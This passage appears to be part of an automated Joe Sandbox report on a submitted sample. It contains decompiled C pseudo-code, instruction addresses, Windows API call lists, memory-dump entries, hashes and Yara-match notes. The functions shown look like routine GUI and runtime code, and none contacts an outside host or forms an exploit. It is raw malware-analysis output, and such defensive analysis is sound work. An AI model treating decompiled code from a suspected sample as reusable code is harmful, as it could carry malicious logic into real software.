                                                                                                                                                                                                                                                                                          				_t45 =  *_t24;
                                                                                                                                                                                                                                                                                          				if( *_t24 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t45);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t25 = _t71 + 0x14; // 0xf33b1476
                                                                                                                                                                                                                                                                                          				_t46 =  *_t25;
                                                                                                                                                                                                                                                                                          				if( *_t25 != 0) {
                                                                                                                                                                                                                                                                                          					E00105DE2(_t46);
                                                                                                                                                                                                                                                                                          					_t74 = _t74 + 4;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t71 + 0x14)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x18)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x1c)) = 0;
                                                                                                                                                                                                                                                                                          				_t29 = _t71 + 8; // 0xffffb600
                                                                                                                                                                                                                                                                                          				_t47 =  *_t29;
                                                                                                                                                                                                                                                                                          				if(_t47 != 0) {
                                                                                                                                                                                                                                                                                          					_t47 = E00105DE2(_t47);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t71 + 8)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0xc)) = 0;
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				return _t47;
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x000fba03
                                                                                                                                                                                                                                                                                          0x000fba05
                                                                                                                                                                                                                                                                                          0x000fba10
                                                                                                                                                                                                                                                                                          0x000fba14
                                                                                                                                                                                                                                                                                          0x000fba1b
                                                                                                                                                                                                                                                                                          0x000fba1f
                                                                                                                                                                                                                                                                                          0x000fba25
                                                                                                                                                                                                                                                                                          0x000fba28
                                                                                                                                                                                                                                                                                          0x000fba2f
                                                                                                                                                                                                                                                                                          0x000fba3d
                                                                                                                                                                                                                                                                                          0x000fba3f
                                                                                                                                                                                                                                                                                          0x000fba42
                                                                                                                                                                                                                                                                                          0x000fba50
                                                                                                                                                                                                                                                                                          0x000fba52
                                                                                                                                                                                                                                                                                          0x000fba55
                                                                                                                                                                                                                                                                                          0x000fba64
                                                                                                                                                                                                                                                                                          0x000fba6c
                                                                                                                                                                                                                                                                                          0x000fba6f
                                                                                                                                                                                                                                                                                          0x000fba6f
                                                                                                                                                                                                                                                                                          0x000fba64
                                                                                                                                                                                                                                                                                          0x000fba50
                                                                                                                                                                                                                                                                                          0x000fba72
                                                                                                                                                                                                                                                                                          0x000fba72
                                                                                                                                                                                                                                                                                          0x000fba7c
                                                                                                                                                                                                                                                                                          0x000fba84
                                                                                                                                                                                                                                                                                          0x000fba84
                                                                                                                                                                                                                                                                                          0x000fba8a
                                                                                                                                                                                                                                                                                          0x000fba8a
                                                                                                                                                                                                                                                                                          0x000fba8f
                                                                                                                                                                                                                                                                                          0x000fba92
                                                                                                                                                                                                                                                                                          0x000fba92
                                                                                                                                                                                                                                                                                          0x000fba98
                                                                                                                                                                                                                                                                                          0x000fba98
                                                                                                                                                                                                                                                                                          0x000fbaa0
                                                                                                                                                                                                                                                                                          0x000fbaad
                                                                                                                                                                                                                                                                                          0x000fbaad
                                                                                                                                                                                                                                                                                          0x000fbab3
                                                                                                                                                                                                                                                                                          0x000fbab3
                                                                                                                                                                                                                                                                                          0x000fbab8
                                                                                                                                                                                                                                                                                          0x000fbabb
                                                                                                                                                                                                                                                                                          0x000fbabb
                                                                                                                                                                                                                                                                                          0x000fbac0
                                                                                                                                                                                                                                                                                          0x000fbac0
                                                                                                                                                                                                                                                                                          0x000fbac5
                                                                                                                                                                                                                                                                                          0x000fbac8
                                                                                                                                                                                                                                                                                          0x000fbacd
                                                                                                                                                                                                                                                                                          0x000fbad0
                                                                                                                                                                                                                                                                                          0x000fbad0
                                                                                                                                                                                                                                                                                          0x000fbad3
                                                                                                                                                                                                                                                                                          0x000fbad6
                                                                                                                                                                                                                                                                                          0x000fbad9
                                                                                                                                                                                                                                                                                          0x000fbadc
                                                                                                                                                                                                                                                                                          0x000fbadc
                                                                                                                                                                                                                                                                                          0x000fbae1
                                                                                                                                                                                                                                                                                          0x000fbae4
                                                                                                                                                                                                                                                                                          0x000fbae4
                                                                                                                                                                                                                                                                                          0x000fbae9
                                                                                                                                                                                                                                                                                          0x000fbae9
                                                                                                                                                                                                                                                                                          0x000fbaee
                                                                                                                                                                                                                                                                                          0x000fbaf1
                                                                                                                                                                                                                                                                                          0x000fbaf6
                                                                                                                                                                                                                                                                                          0x000fbaf9
                                                                                                                                                                                                                                                                                          0x000fbaf9
                                                                                                                                                                                                                                                                                          0x000fbafc
                                                                                                                                                                                                                                                                                          0x000fbaff
                                                                                                                                                                                                                                                                                          0x000fbb02
                                                                                                                                                                                                                                                                                          0x000fbb02
                                                                                                                                                                                                                                                                                          0x000fbb07
                                                                                                                                                                                                                                                                                          0x000fbb0a
                                                                                                                                                                                                                                                                                          0x000fbb12
                                                                                                                                                                                                                                                                                          0x000fbb12
                                                                                                                                                                                                                                                                                          0x000fbb15
                                                                                                                                                                                                                                                                                          0x000fbb18
                                                                                                                                                                                                                                                                                          0x000fbb1e
                                                                                                                                                                                                                                                                                          0x000fbb2c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(CCCC0004), ref: 000FBA33
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000FBA48
                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 000FBA5C
                                                                                                                                                                                                                                                                                          • DestroyMenu.USER32(00001F34,?,000F9A84), ref: 000FBA84
                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(010845F6,?,000F9A84), ref: 000FBA92
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(FC45C700), ref: 000FBAA3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$DestroyLong$DeleteImageList_MenuObject
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2453398382-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a90a71e606d7898174657f7e2d89a2d1a421ed23bd1d0e964db7cf030a335791
                                                                                                                                                                                                                                                                                          • Instruction ID: 0f4604d0cc185782e2ef7ecdc153946a926681a318e283faaf2e758f8b18661e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a90a71e606d7898174657f7e2d89a2d1a421ed23bd1d0e964db7cf030a335791
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C414EB1A00B049FC721DF6AD984A2BF7E9FF54700B248A1AE592C3E50D7B5E9409F51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0252629F
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 025262BB
                                                                                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(-0000000C), ref: 025262CF
                                                                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(-0000000C), ref: 0252630B
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02526332
                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0252633F
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0252634C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepVirtualWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1808503317-0
                                                                                                                                                                                                                                                                                          • Opcode ID: da280e71ec3a99b65995f52adc77ad663979440fa247493721eb839d5c2aa800
                                                                                                                                                                                                                                                                                          • Instruction ID: 728de63b426e2e59f065a29d73cfbbc2cdae4e5eb96f5f6767e57f680986c22b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da280e71ec3a99b65995f52adc77ad663979440fa247493721eb839d5c2aa800
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C212AB5900218EFDB04DF94C988BAEBBB9FF49301F148698E515A72C1C739DE84CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02528F89
                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(00001388,00000000), ref: 02528FD5
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 02528FED
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 02528FFC
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 02529007
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 0252906C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1244543080-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ed182e9468d2a1e01710d6f68e2a7221afbf645ae7bff158efb8b97c7a8eedfb
                                                                                                                                                                                                                                                                                          • Instruction ID: f42469ca1511d1b81f2d44d2655019b3f1e37c88a577191b8e146e7c0322463d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed182e9468d2a1e01710d6f68e2a7221afbf645ae7bff158efb8b97c7a8eedfb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89312B74A04209EBEB14DF94C848BAEB7B1FB45305F248668E505AB3C0D7799E88CF95
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FEDB0(void* __ecx, void* __esi, intOrPtr _a4, long* _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				signed char _t28;
                                                                                                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t50 = __esi;
                                                                                                                                                                                                                                                                                          				_t38 = 0;
                                                                                                                                                                                                                                                                                          				if(( *(__esi + 0x58) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          					GetWindowThreadProcessId(GetActiveWindow(),  &_v8);
                                                                                                                                                                                                                                                                                          					_t38 = 0 | GetCurrentProcessId() != _v8;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(IsWindowEnabled( *(_t50 + 0x5c)) == 0 || _t38 != 0) {
                                                                                                                                                                                                                                                                                          					_t39 = _a4;
                                                                                                                                                                                                                                                                                          					if(( *(_t39 + 0x14) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t39 = _a4;
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					_t28 =  *(_t39 + 0x14);
                                                                                                                                                                                                                                                                                          					 *_a8 = 0;
                                                                                                                                                                                                                                                                                          					if((_t28 & 0x00000085) == 0) {
                                                                                                                                                                                                                                                                                          						if((_t28 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t50 + 0x5c), 0x11f, 0,  *(_t50 + 0x44));
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(( *(_t39 + 0x14) & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t50 + 0x5c), 0x11f, 0xffff0000, 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x000fedb0
                                                                                                                                                                                                                                                                                          0x000fedb5
                                                                                                                                                                                                                                                                                          0x000fedbb
                                                                                                                                                                                                                                                                                          0x000fedc8
                                                                                                                                                                                                                                                                                          0x000fedd7
                                                                                                                                                                                                                                                                                          0x000fedd7
                                                                                                                                                                                                                                                                                          0x000fede6
                                                                                                                                                                                                                                                                                          0x000fedec
                                                                                                                                                                                                                                                                                          0x000fedf7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fedf9
                                                                                                                                                                                                                                                                                          0x000fedfd
                                                                                                                                                                                                                                                                                          0x000fedfd
                                                                                                                                                                                                                                                                                          0x000fee00
                                                                                                                                                                                                                                                                                          0x000fee00
                                                                                                                                                                                                                                                                                          0x000fee03
                                                                                                                                                                                                                                                                                          0x000fee03
                                                                                                                                                                                                                                                                                          0x000fee09
                                                                                                                                                                                                                                                                                          0x000fee11
                                                                                                                                                                                                                                                                                          0x000fee1c
                                                                                                                                                                                                                                                                                          0x000fee2d
                                                                                                                                                                                                                                                                                          0x000fee2d
                                                                                                                                                                                                                                                                                          0x000fee33
                                                                                                                                                                                                                                                                                          0x000fee45
                                                                                                                                                                                                                                                                                          0x000fee45
                                                                                                                                                                                                                                                                                          0x000fee47
                                                                                                                                                                                                                                                                                          0x000fee4e
                                                                                                                                                                                                                                                                                          0x000fee4e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 000FEDC1
                                                                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 000FEDC8
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 000FEDCE
                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 000FEDDE
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000011F,00000000,?), ref: 000FEE2D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000011F,FFFF0000,00000000), ref: 000FEE45
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$MessageProcessSend$ActiveCurrentEnabledThread
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1989142321-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6a71fc5f26294ae55893853ab07ea771783a8d23d5f19c7f642b1a4750916f5f
                                                                                                                                                                                                                                                                                          • Instruction ID: 17e063674a154814befb1ca6feaface1eb249b9407608f79dbf37b8765a5467c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a71fc5f26294ae55893853ab07ea771783a8d23d5f19c7f642b1a4750916f5f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711A332640348ABD724CF64ED88FABB7E8BB49314F148548FF419BA95C6B5ED80D760
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E0010E601(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				intOrPtr _t48;
                                                                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t61 = __eflags;
                                                                                                                                                                                                                                                                                          				_push(0x2c);
                                                                                                                                                                                                                                                                                          				_push(0x1155f0);
                                                                                                                                                                                                                                                                                          				E00108F60(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                          				_t48 = __ecx;
                                                                                                                                                                                                                                                                                          				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                                                                                                                                                                                                                          				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                                                                                                                                                                                                                          				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 - 0x28)) = E0010E1B9(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0010756D(__ecx, _t53, _t61) + 0x88));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0010756D(_t48, _t53, _t61) + 0x8c));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(E0010756D(_t48, _t53, _t61) + 0x88)) = _t57;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(E0010756D(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                                                                                                                                                                                                                          				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                                                                                                                                                                                                                          				 *(_t58 - 4) = 1;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 - 0x1c)) = E0010E25E(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                                                                                                                                                                                                                          				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                          				 *(_t58 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                          				E0010E727(_t48, _t53, _t55, _t57, _t61);
                                                                                                                                                                                                                                                                                          				return E00108FA5( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x0010e601
                                                                                                                                                                                                                                                                                          0x0010e601
                                                                                                                                                                                                                                                                                          0x0010e603
                                                                                                                                                                                                                                                                                          0x0010e608
                                                                                                                                                                                                                                                                                          0x0010e60d
                                                                                                                                                                                                                                                                                          0x0010e60f
                                                                                                                                                                                                                                                                                          0x0010e612
                                                                                                                                                                                                                                                                                          0x0010e615
                                                                                                                                                                                                                                                                                          0x0010e618
                                                                                                                                                                                                                                                                                          0x0010e61f
                                                                                                                                                                                                                                                                                          0x0010e630
                                                                                                                                                                                                                                                                                          0x0010e63e
                                                                                                                                                                                                                                                                                          0x0010e64c
                                                                                                                                                                                                                                                                                          0x0010e654
                                                                                                                                                                                                                                                                                          0x0010e662
                                                                                                                                                                                                                                                                                          0x0010e668
                                                                                                                                                                                                                                                                                          0x0010e66f
                                                                                                                                                                                                                                                                                          0x0010e672
                                                                                                                                                                                                                                                                                          0x0010e688
                                                                                                                                                                                                                                                                                          0x0010e68b
                                                                                                                                                                                                                                                                                          0x0010e700
                                                                                                                                                                                                                                                                                          0x0010e707
                                                                                                                                                                                                                                                                                          0x0010e70e
                                                                                                                                                                                                                                                                                          0x0010e71b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __CreateFrameInfo.LIBCMT ref: 0010E629
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E1B9: __getptd.LIBCMT ref: 0010E1C7
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E1B9: __getptd.LIBCMT ref: 0010E1D5
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E633
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __getptd_noexit.LIBCMT ref: 00107570
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __amsg_exit.LIBCMT ref: 0010757D
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E641
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E64F
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E65A
                                                                                                                                                                                                                                                                                          • _CallCatchBlock2.LIBCMT ref: 0010E680
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E25E: __CallSettingFrame@12.LIBCMT ref: 0010E2AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E727: __getptd.LIBCMT ref: 0010E736
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E727: __getptd.LIBCMT ref: 0010E744
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1602911419-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f2ada90901f7ceb325b6b2b292af5385be8fcee617a217e149dd06c46c153822
                                                                                                                                                                                                                                                                                          • Instruction ID: 0e8e96b2f092b1c30832dd01760f9031b4605cacb66420248ffe10eea8435b4b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ada90901f7ceb325b6b2b292af5385be8fcee617a217e149dd06c46c153822
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3211F6B1D04309DFDF00EFA4D845AEDBBB1FF18314F108469F894A7292DBB89A119B50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                          			E000FAEC0(intOrPtr __eax, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                                          				struct %anon39 _t23;
                                                                                                                                                                                                                                                                                          				intOrPtr _t24;
                                                                                                                                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t51;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t37 = __ecx;
                                                                                                                                                                                                                                                                                          				_t47 = __ecx;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ecx + 0x28)) == 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(__ecx + 0x28)) = __eax;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t51 = _t47 + 8;
                                                                                                                                                                                                                                                                                          				if(_t51 == 0) {
                                                                                                                                                                                                                                                                                          					RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					_t23 =  *(_t47 + 0x24);
                                                                                                                                                                                                                                                                                          					_push(_t51);
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t23 + 4)) == 0) {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t23 + 4)) = _t37;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t52 = _t47 + 8;
                                                                                                                                                                                                                                                                                          					if(_t52 == 0) {
                                                                                                                                                                                                                                                                                          						RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						_t24 = _t37;
